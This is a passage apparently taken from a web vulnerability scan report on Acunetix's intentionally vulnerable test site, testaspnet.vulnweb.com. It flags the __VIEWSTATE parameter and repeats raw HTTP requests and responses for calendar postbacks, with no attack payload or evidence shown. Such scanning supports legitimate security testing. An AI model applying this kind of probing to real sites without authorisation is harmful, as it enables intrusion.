style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1185 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,185 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8278&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAar%2FjitoIZGRkWz97XtCPcvdZcEfYYYhEGsRhmBc%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLH5PTZCALtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAimbbMo39hISLz2luR%2Bj%2BAEjdJfN
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:48:42 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDAar/jitoIZGRkWz97XtCPcvdZcEfYYYhEGsRhmBc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLH5PTZCALtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAimbbMo39hISLz2luR+j+AEjdJfN" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:White" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:Black" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8297')" style="color:Black" title="September 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8298')" style="color:Black" title="September 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8299')" style="color:Black" title="September 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8300')" style="color:Black" title="September 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8301')" style="color:Black" title="September 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8302')" style="color:Black" title="September 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8303')" style="color:Black" title="September 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8304')" style="color:Black" title="September 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8305')" style="color:Black" title="September 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8306')" style="color:Black" title="September 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8307')" style="color:Black" title="September 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8308')" style="color:Black" title="September 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8309')" style="color:Black" title="October 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8310')" style="color:Black" title="October 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8311')" style="color:Black" title="October 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8312')" style="color:Black" title="October 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8313')" style="color:Black" title="October 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8314')" style="color:Black" title="October 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8315')" style="color:Black" title="October 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8316')" style="color:Black" title="October 08">8</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1185 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,185 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8294&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDABmZ2l9oIZGRkcLeTgBeDlt4BUkCWewkLQY%2FDXX0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKo4bj%2BBgLtiZ78CwLHkIz%2BDgKK%2BZ%2FNDAKK%2BZ%2FNDAKK%2BbPgBQKK%2BbPgBQKK%2BaeHDQKK%2BaeHDQKK%2BZvsCwKK%2BZvsCwKK%2BY%2BDAwKK%2BY%2BDAwK%2Fk%2FvECQK%2Fk%2FvECQK%2Fk%2B%2BbAQK%2Fk%2B%2BbAQK%2Fk4O%2BCgK%2Fk4O%2BCgK%2Fk7fVAwK%2Fk7fVAwK%2Fk6voDAK%2Fk6voDAK%2Fk9%2BMBAK%2Fk9%2BMBAK%2Fk%2FOjDQK%2Fk%2FOjDQK%2Fk%2BfGBgK%2Fk%2BfGBgK%2Fk9uvAwK%2Fk9uvAwK%2Fk8%2FCDAK%2Fk8%2FCDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV%2BAkCkLqV%2BAkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAuk6QzrvDujVD5qOQQHM%2FKdIeqJe
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:32:18 GMT Content-Length: 12635
Response Body - size: 12,635 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA1Omsi9oIHgJTRBYBBgDABmZ2l9oIZGRkcLeTgBeDlt4BUkCWewkLQY/DXX0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKo4bj+BgLtiZ78CwLHkIz+DgKK+Z/NDAKK+Z/NDAKK+bPgBQKK+bPgBQKK+aeHDQKK+aeHDQKK+ZvsCwKK+ZvsCwKK+Y+DAwKK+Y+DAwK/k/vECQK/k/vECQK/k++bAQK/k++bAQK/k4O+CgK/k4O+CgK/k7fVAwK/k7fVAwK/k6voDAK/k6voDAK/k9+MBAK/k9+MBAK/k/OjDQK/k/OjDQK/k+fGBgK/k+fGBgK/k9uvAwK/k9uvAwK/k8/CDAK/k8/CDAKQutnrDwKQutnrDwKQus2OBwKQus2OBwKQuuElApC64SUCkLqV+AkCkLqV+AkCkLqJnwECkLqJnwECkLq9sgoCkLq9sgoCkLrR1gMCkLrR1gMCkLrF7QwCkLrF7QwCkLq51QkCkLq51QkCkLqt6AICkLqt6AIC19nsngcC19nsngcC19mANQLX2YA1AtfZtMgJAtfZtMgJAtfZqO8CAtfZqO8CAtfZ3IMKAtfZ3IMKAtfZ8KYDAtfZ8KYDAtfZ5P0MAtfZ5P0MAtfZmJAEAtfZmJAEAtfZzPkCAtfZzPkCAtfZ4JwKAtfZ4JwKAqjg8oUNAqjg8oUNAqjg5tgGAqjg5tgGAqjgmv8PAqjgmv8PAqjgjpIHAqjgjpIHAqjgoikCqOCiKQKo4NbNCQKo4NbNCQKo4MrgAgKo4MrgAuk6QzrvDujVD5qOQQHM/KdIeqJe" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">September 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8309')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8275')" style="color:Black" title="August 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8276')" style="color:Black" title="August 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8277')" style="color:Black" title="August 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8278')" style="color:Black" title="August 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8279')" style="color:Black" title="September 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8280')" style="color:Black" title="September 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8281')" style="color:Black" title="September 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8282')" style="color:Black" title="September 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8283')" style="color:Black" title="September 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8284')" style="color:Black" title="September 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8285')" style="color:Black" title="September 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8286')" style="color:Black" title="September 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8287')" style="color:Black" title="September 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8288')" style="color:Black" title="September 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8289')" style="color:Black" title="September 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8290')" style="color:Black" title="September 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8291')" style="color:Black" title="September 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8292')" style="color:Black" title="September 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8293')" style="color:Black" title="September 15">15</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8294')" style="color:White" title="September 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8295')" style="color:Black" title="September 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8296')" style="color:Black" title="September 